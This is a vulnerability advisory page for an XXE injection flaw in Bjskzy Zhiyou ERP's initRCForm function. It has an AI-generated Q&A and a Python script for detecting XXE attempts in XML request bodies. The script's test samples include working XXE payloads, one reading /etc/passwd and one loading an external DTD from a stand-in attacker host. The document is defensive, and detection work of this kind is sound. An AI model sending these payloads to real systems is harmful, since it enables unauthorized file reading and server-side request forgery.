CVE-2026-1218
XML External Entity Injection in Bjskzy Zhiyou ERP Remote Exploit
Publication date: 2026-01-20
Last updated on: 2026-04-29
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| beijing_shikong_zhiyou_technology_co_ltd | bjskzy_zhiyou_erp | to 11.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
| CWE-610 | The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-1218 is an XML External Entity (XXE) injection vulnerability in Bjskzy Zhiyou ERP up to version 11.0. It affects the function initRCForm in the RichClientService.class file. An attacker who controls the XML submitted to that function can declare external entities in a DOCTYPE, and the parser then resolves them and embeds documents outside the application's control (local files or remote URLs) into its output (CWE-611). The flaw can be exploited remotely without physical or local access, and a proof-of-concept exploit is publicly available. [1, 2]
How can this vulnerability impact me?
This vulnerability can compromise the confidentiality, integrity, and availability of the affected system. An attacker exploiting this XXE flaw can read files reachable by the ERP process, make the server issue requests to internal systems on the attacker's behalf, or cause a denial of service through entity expansion; code execution is possible only in unusual parser or platform configurations and depends on the payload. The attack is remotely executable and considered easy to perform, and the public proof of concept lowers the bar further, which increases the risk of exploitation. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves monitoring for XML External Entity (XXE) injection attempts aimed at the initRCForm function of the RichClientService component. Because the exploit is public and works through XML processing, network detection can inspect XML request bodies for DOCTYPE declarations that define external entities (SYSTEM or PUBLIC identifiers, including parameter entities declared with %) and for references that expand them. The resources do not provide specific commands; general approaches include network intrusion detection systems (NIDS) with signatures for XXE attacks, reviewing application logs for XML input that contains entity declarations, and inventorying Bjskzy Zhiyou ERP installations at version 11.0 or earlier to identify exposure. [1, 2]
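The following is an added example, not code from the page, the vendor, or the cited resources. It shows the inspection logic a WAF rule or log-review script would apply to XML request bodies: flag any DOCTYPE, and alert on external entity declarations (SYSTEM or PUBLIC, general or parameter) together with the URI scheme they point at and whether the entity is actually expanded. The request bodies are constructed; the real element names accepted by initRCForm are not documented on this page, so the <form> root is a placeholder.

```python
import re

# Any DTD at all: entity declarations can only appear inside one.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# <!ENTITY name SYSTEM "uri">, <!ENTITY name PUBLIC "pubid" "uri">
# and the parameter-entity form <!ENTITY % name SYSTEM "uri">.
# XML keywords are case-sensitive; detection is deliberately lenient.
ENTITY_DECL_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?:\"[^\"]*\"\s+|'[^']*'\s+)?"      # public identifier, PUBLIC only
    r"(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)


def inspect_xml(body):
    """Report the DTD and external-entity declarations found in one XML body."""
    report = {"doctype": bool(DOCTYPE_RE.search(body)), "external_entities": []}
    if not report["doctype"]:
        return report
    for m in ENTITY_DECL_RE.finditer(body):
        uri = m.group("uri")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else "relative"
        name = m.group("name")
        report["external_entities"].append({
            "entity": name,
            "parameter": bool(m.group("param")),
            "kind": m.group("kind").upper(),
            "uri": uri,
            "scheme": scheme,
            # Is the entity expanded anywhere (&name; in content, %name; in the DTD)?
            "referenced": re.search(r"[&%]" + re.escape(name) + r";", body) is not None,
        })
    return report


def triage(body):
    """Map a report to the action a WAF or NIDS rule would take."""
    report = inspect_xml(body)
    if report["external_entities"]:
        return "alert"     # external entity declared: treat as an XXE attempt
    if report["doctype"]:
        return "review"    # DTD present, but only internal entities
    return "pass"


# Constructed request bodies, not captured traffic (hypothetical <form> root).
SAMPLES = {
    "benign":
        '<?xml version="1.0"?><form><name>alice</name></form>',
    "file_read":
        '<?xml version="1.0"?>'
        '<!DOCTYPE form [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        '<form><name>&xxe;</name></form>',
    "oob_dtd":
        '<?xml version="1.0"?>'
        '<!DOCTYPE form [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
        '<form/>',
    "internal_entity":
        '<!DOCTYPE form [<!ENTITY company "ACME">]><form>&company;</form>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = [(e["entity"], e["scheme"]) for e in inspect_xml(body)["external_entities"]]
        print(f"{label:16} {triage(body):7} {hits}")
```

The "review" tier matters in practice: a legitimate client of this ERP is unlikely to send a DTD at all, so a DOCTYPE alone is worth logging even when no external entity is declared, and the scheme field (file, http, ftp, jar, and so on) tells the analyst whether the attempt was a local read or an out-of-band/SSRF variant.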
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include replacing the affected Bjskzy Zhiyou ERP product with an alternative solution, as the resources report no vendor patch or countermeasure. Review your ERP deployments and, where possible, disable or restrict access to the vulnerable initRCForm function, limit the network exposure of the ERP system, and monitor for exploit attempts. If the XML parser used by the component is configurable, hardening it to reject DOCTYPE declarations, or at least to disable resolution of external general and parameter entities, removes the root cause rather than just the symptom. Since a proof-of-concept exploit is public, urgent action is recommended. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows unauthorized data access and system compromise through XML External Entity injection, impacting confidentiality, integrity, and availability of the system. Since Bjskzy ERP is used in regulated industries such as pharmaceuticals and supply chain, this vulnerability could lead to non-compliance with industry regulations like Good Supply Practice (GSP) standards. Although GDPR or HIPAA are not explicitly mentioned, the potential for data disclosure and system compromise implies risks to compliance with data protection regulations that require safeguarding sensitive information. [2]